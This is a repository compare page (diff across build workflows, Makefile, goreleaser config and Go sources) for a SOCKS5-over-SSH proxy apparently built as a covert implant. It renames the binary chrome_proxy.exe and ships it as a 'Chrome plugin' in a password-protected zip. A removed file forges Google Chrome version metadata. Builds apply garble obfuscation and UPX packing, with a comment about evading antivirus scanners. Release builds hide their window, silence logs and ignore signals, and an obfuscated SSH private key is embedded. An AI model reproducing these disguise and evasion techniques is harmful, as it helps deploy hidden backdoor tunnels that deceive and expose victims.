jerry
/
go-socks5-ssh-proxy
mirror of https://github.com/xor-gate/go-socks5-ssh-proxy
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: jerry:36c7e6843f01624f2d7a9a4c0301d057e2e15f23
Branches Tags
jerry:main
jerry:freebsd-build
..
compare: jerry:9a402ede2edc56ee078bb5fdbe4ea8491e663c95
Branches Tags
jerry:main
jerry:freebsd-build

No commits in common. "36c7e6843f01624f2d7a9a4c0301d057e2e15f23" and "9a402ede2edc56ee078bb5fdbe4ea8491e663c95" have entirely different histories.
36c7e6843f ... 9a402ede2e

13 changed files with 87 additions and 267 deletions
Show Stats Expand all files Collapse all files

83
.github/workflows/build.yml vendored
View File

@ -35,19 +35,14 @@ jobs:
base64-encoded-secret: ${{ secrets.CONFIG_RELEASE_GO_FILE }}
filename: "config_release.go"
- name: Use resources/ssh_private_key.base64.rot13 from action secrets
- name: Use resources/ssh_private_key from action secrets
uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
with:
base64-encoded-secret: ${{ secrets.RESOURCES_SSH_PRIVATE_KEY_BASE64_ROT13 }}
filename: "ssh_private_key.base64.rot13"
base64-encoded-secret: ${{ secrets.RESOURCES_SSH_PRIVATE_KEY }}
filename: "ssh_private_key"
working-directory: "./resources"
- name: Set up MinGW
uses: egor-tensin/setup-mingw@v2
with:
platform: x64
- run: make win
- run: make release
- name: Store release artifacts
uses: actions/upload-artifact@v4
@ -55,3 +50,73 @@ jobs:
name: dist-release
path: |
dist
goreleaser:
name: Build releases with goreleaser
environment: prod
runs-on: ubuntu-latest
steps:
- name: Check out repository code
uses: actions/checkout@v4
- uses: actions/setup-go@v5
with:
go-version: ${{ env.GO_VERSION }}
cache: true
check-latest: true
- name: Set up MinGW
uses: egor-tensin/setup-mingw@v2
with:
platform: x64
- name: Use config_release.go from action secrets
uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
with:
base64-encoded-secret: ${{ secrets.CONFIG_RELEASE_GO_FILE }}
filename: "config_release.go"
- name: Use resources/ssh_private_key from action secrets
uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
with:
base64-encoded-secret: ${{ secrets.RESOURCES_SSH_PRIVATE_KEY }}
filename: "ssh_private_key"
working-directory: "./resources"
- name: Install upx
run: sudo apt install upx
- name: Install garble
run: make install-deps
- name: Run GoReleaser to build releases
uses: goreleaser/goreleaser-action@v6
with:
# either 'goreleaser' (default) or 'goreleaser-pro'
distribution: goreleaser
# 'latest', 'nightly', or a semver
version: '~> v2'
args: release --clean --snapshot
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
# NOTE: Some virus and malware scanners detect mangled UPX headers and mark it as suspisious
#- name: Obfuscate UPX packed executable
# run: "go run cmd/upx-obfuscator/main.go dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe"
- name: Copy win64 release exe for dist
run: "cp dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe dist/chrome_proxy.exe"
- name: Store win64 release exe for dist
uses: actions/upload-artifact@v4
with:
name: ChromeProxyPlugin
path: |
dist/chrome_proxy.exe
- name: Store all GoReleaser artifacts
uses: actions/upload-artifact@v4
with:
name: dist-goreleaser
path: |
dist

69
.github/workflows/goreleaser.yaml.snippet vendored
View File

@ -1,69 +0,0 @@
goreleaser:
name: Build releases with goreleaser
environment: prod
runs-on: ubuntu-latest
steps:
- name: Check out repository code
uses: actions/checkout@v4
- uses: actions/setup-go@v5
with:
go-version: ${{ env.GO_VERSION }}
cache: true
check-latest: true
- name: Set up MinGW
uses: egor-tensin/setup-mingw@v2
with:
platform: x64
- name: Use config_release.go from action secrets
uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
with:
base64-encoded-secret: ${{ secrets.CONFIG_RELEASE_GO_FILE }}
filename: "config_release.go"
- name: Use resources/ssh_private_key.base64.rot13 from action secrets
uses: mobiledevops/secret-to-file-action@v1 # TODO native in Makefile, can be unsafe...
with:
base64-encoded-secret: ${{ secrets.RESOURCES_SSH_PRIVATE_KEY_BASE64_ROT13 }}
filename: "ssh_private_key.base64.rot13"
working-directory: "./resources"
- name: Install upx
run: sudo apt install upx
- name: Install garble
run: make install-deps
- name: Run GoReleaser to build releases
uses: goreleaser/goreleaser-action@v6
with:
# either 'goreleaser' (default) or 'goreleaser-pro'
distribution: goreleaser
# 'latest', 'nightly', or a semver
version: '~> v2'
args: release --clean --snapshot --id win-release
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
# NOTE: Some virus and malware scanners detect mangled UPX headers and mark it as suspisious
#- name: Obfuscate UPX packed executable
# run: "go run cmd/upx-obfuscator/main.go dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe"
- name: Copy win64 release exe for dist
run: "cp dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe dist/chrome_proxy.exe"
- name: Store win64 release exe for dist
uses: actions/upload-artifact@v4
with:
name: ChromeProxyPlugin
path: |
dist/chrome_proxy.exe
- name: Store all GoReleaser artifacts
uses: actions/upload-artifact@v4
with:
name: dist-goreleaser
path: |
dist

2
.gitignore vendored
View File

@ -7,5 +7,5 @@ socks5-ssh-proxy.release
*.base64
*.exe
*.zip
resource.syso
dist/

3
.goreleaser.yaml
View File

@ -60,11 +60,10 @@ builds:
goarch:
- amd64
ldflags:
- "-H=windowsgui"
- -w -H=windowsgui
gobinary: "scripts/garble.sh"
tags:
- release
- windows
upx:
- # Whether to enable it or not.

32
Makefile
View File

@ -1,8 +1,6 @@
SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go system_windows.go system_linux.go system_darwin.go
GARBLE_BIN = $(shell go env GOPATH)/bin/garble
GOVERSIONINFO_BIN = $(shell go env GOPATH)/bin/goversioninfo
GARBLE_CMD = $(GARBLE_BIN) -literals -tiny
export PATH := $(shell go env GOPATH)/bin:$(PATH)
all: socks5-ssh-proxy
@ -20,31 +18,23 @@ socks5-ssh-proxy: $(SOURCES)
socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
GOOS=darwin GOARCH=amd64 $(GARBLE_CMD) build -tags release -o $@
upx $@
win: dist/chrome_proxy.exe
dist/chrome_proxy.exe: socks5-ssh-proxy.exe
mkdir -p dist
cp -v $< $@
socks5-ssh-proxy.exe: resources $(GOVERSIONINFO_BIN) $(GARBLE_BIN) $(SOURCES)
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 go generate -tags windows,release
CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1 GOOS=windows GOARCH=amd64 $(GARBLE_BIN) -literals build -trimpath -ldflags "-s -w -H=windowsgui -buildid=" -tags windows,release -o $@
win: socks5-ssh-proxy.exe
socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
# CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui -X cfg.VerboseModeKey=$(RELEASE_VERBOSE_MODE_KEY)" -tags release -o $@
#CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui" -tags release -o $@
#upx $@
#go run cmd/upx-obfuscator/main.go $@
CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui" -tags release -o $@
upx $@
go run cmd/upx-obfuscator/main.go $@
goreleaser: resources $(GARBLE_BIN)
goreleaser build --verbose --clean --snapshot --id win-release
# goreleaser build --clean --snapshot --id win-release
goreleaser build --clean --snapshot --id win-release
win-package: ChromeProxyHelperPlugin.zip
ChromeProxyHelperPlugin.zip: socks5-ssh-proxy.exe
cp socks5-ssh-proxy.exe chrome_proxy.exe
#upx chrome_proxy.exe
upx chrome_proxy.exe
zip -eP resistanceIsFutile ChromeProxyHelperPlugin.zip chrome_proxy.exe
rm -f chrome_proxy.exe
install-deps: $(GARBLE_BIN) $(GOVERSIONINFO_BIN)
install-deps: $(GARBLE_BIN)
$(GARBLE_BIN):
go install mvdan.cc/garble@v0.12.1
$(GOVERSIONINFO_BIN):
go install github.com/josephspurrier/goversioninfo/cmd/goversioninfo@v1.4.0
clean:
rm -f *.exe
rm -f *.zip
@ -69,14 +59,10 @@ resources/ssh_private_key:
@echo "====================================="
resources/ssh_private_key.base64: resources/ssh_private_key
base64 -i $< -o $@
resources/ssh_private_key.base64.rot13: resources/ssh_private_key.base64
go run cmd/rot13-obfuscator/main.go $< $@
resources/ssh_private_key.base64.rot13.github: resources/ssh_private_key.base64.rot13
base64 -i $< -o $@
fmt:
gofmt -w *.go
secrets: config_release.go.base64 resources/ssh_private_key.base64.rot13.github
secrets: config_release.go.base64 resources/ssh_private_key.base64
.phony: clean test win

51
cmd/rot13-obfuscator/main.go
View File

@ -1,51 +0,0 @@
package main
import (
"fmt"
"io/ioutil"
"log"
"os"
)
func rot13(input byte) byte {
if 'A' <= input && input <= 'Z' {
return 'A' + (input-'A'+13)%26
} else if 'a' <= input && input <= 'z' {
return 'a' + (input-'a'+13)%26
}
return input
}
func rot13Bytes(data []byte) []byte {
result := make([]byte, len(data))
for i, b := range data {
result[i] = rot13(b)
}
return result
}
func main() {
if len(os.Args) != 3 {
log.Fatalf("Usage: %s <input file> <output file>\n", os.Args[0])
}
inputFile := os.Args[1]
outputFile := os.Args[2]
// Read the input file
inputData, err := ioutil.ReadFile(inputFile)
if err != nil {
log.Fatalf("Failed to read input file: %v", err)
}
// Apply ROT13 transformation
outputData := rot13Bytes(inputData)
// Write the transformed data to the output file
err = ioutil.WriteFile(outputFile, outputData, 0644)
if err != nil {
log.Fatalf("Failed to write output file: %v", err)
}
fmt.Printf("File %s has been converted using ROT13 and saved to %s\n", inputFile, outputFile)
}

1
docs/NOTES.md
View File

@ -82,7 +82,6 @@ Check if running under wine by testing if executables are present:
* <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
* <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
* <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
* <https://www.trisul.org/blog/traffic-analysis-of-secure-shell-ssh/>
## Development information

11
main.go
View File

@ -14,13 +14,6 @@ import (
var fetchedSSHHostPublicKey SSHHostPublicKeyFetcher
var sshfpResolver *sshfp.Resolver
func secureEraseResourceSSHPrivateKey() {
log.Println("ERASING SSH private key")
// for i := range resourceSSHPrivateKey {
// resourceSSHPrivateKey[i] = 0
// }
}
type SSHHostPublicKeyFetcher struct {
ssh.PublicKey
}
@ -101,8 +94,6 @@ func main() {
var signer ssh.Signer
var privateKey string
defer secureEraseResourceSSHPrivateKey()
dnsServers := sshfp.WithDNSClientConfigFromReader(cfg.DNSServersResolvConf)
sshfpResolver, err = sshfp.NewResolver(dnsServers)
@ -140,8 +131,6 @@ func main() {
log.Println(err)
}
secureEraseResourceSSHPrivateKey()
log.Println("SOCKS5 Addr", proxyServerURL)
systemOSDetect()

39
main_release.go
View File

@ -6,52 +6,15 @@ package main
import (
_ "embed"
"os"
"log"
"encoding/base64"
)
//go:embed resources/ssh_private_key.base64.rot13
var resourceSSHPrivateKeyBase64Rot13 string
//go:embed resources/ssh_private_key
var resourceSSHPrivateKey string
func rot13(input byte) byte {
if 'A' <= input && input <= 'Z' {
return 'A' + (input-'A'+13)%26
} else if 'a' <= input && input <= 'z' {
return 'a' + (input-'a'+13)%26
}
return input
}
// rot13String function to apply ROT13 to a string
func rot13String(input string) string {
result := make([]byte, len(input))
for i := range input {
result[i] = rot13(input[i])
}
return string(result)
}
func resourceSSHPrivateKeyUnpack() {
// TODO use github.com/awnumar/memguard
resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13)
decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64)
if err != nil {
log.Fatalf("Failed to decode resourceSSHPrivateKeyBase64Rot13: %v", err)
}
resourceSSHPrivateKey = string(decodedData)
}
func init() {
dontSilenceKey := os.Getenv("VMK")
if dontSilenceKey != cfg.VerboseModeKey {
systemRouteAllLogging(os.DevNull)
systemIgnoreAllSignals()
}
resourceSSHPrivateKeyUnpack()
}

17
resources/chrome_proxy.exe.manifest
View File

@ -1,17 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
type="win32"
name="blabla"
version="1.0.0.0"
processorArchitecture="*"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>

2
scripts/garble.sh
View File

@ -1,2 +1,2 @@
#!/usr/bin/env bash
`go env GOPATH`/bin/garble -literals $@
`go env GOPATH`/bin/garble -literals -tiny $@

1
system_windows.go
View File

@ -1,5 +1,4 @@
//go:build windows
//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64
// +build windows
package main

43
versioninfo.json
View File

@ -1,43 +0,0 @@
{
"FixedFileInfo": {
"FileVersion": {
"Major": 1,
"Minor": 0,
"Patch": 0,
"Build": 0
},
"ProductVersion": {
"Major": 1,
"Minor": 0,
"Patch": 0,
"Build": 0
},
"FileFlagsMask": "3f",
"FileFlags ": "00",
"FileOS": "040004",
"FileType": "01",
"FileSubType": "00"
},
"StringFileInfo": {
"CompanyName": "Google LLC",
"FileDescription": "Google Chrome",
"FileVersion": "127.0.6533.73",
"InternalName": "chrome_proxy",
"LegalCopyright": "Copyright 2024 Google LLC. All rights reserved.",
"OriginalFilename": "chrome_proxy.exe",
"ProductName": "Google Chrome",
"ProductVersion": "127.0.6533.73",
"CompanyShortName": "Google",
"ProductShortName": "Chrome",
"LastChange": "b59f345ebd6c6bd0b5eb2a715334e912b514773d-refs/branch-heads/6533@{#1761}",
"Official Build": "1"
},
"VarFileInfo": {
"Translation": {
"LangID": "0409",
"CharsetID": "04B0"
}
},
"IconPath": "",
"ManifestPath": ""
}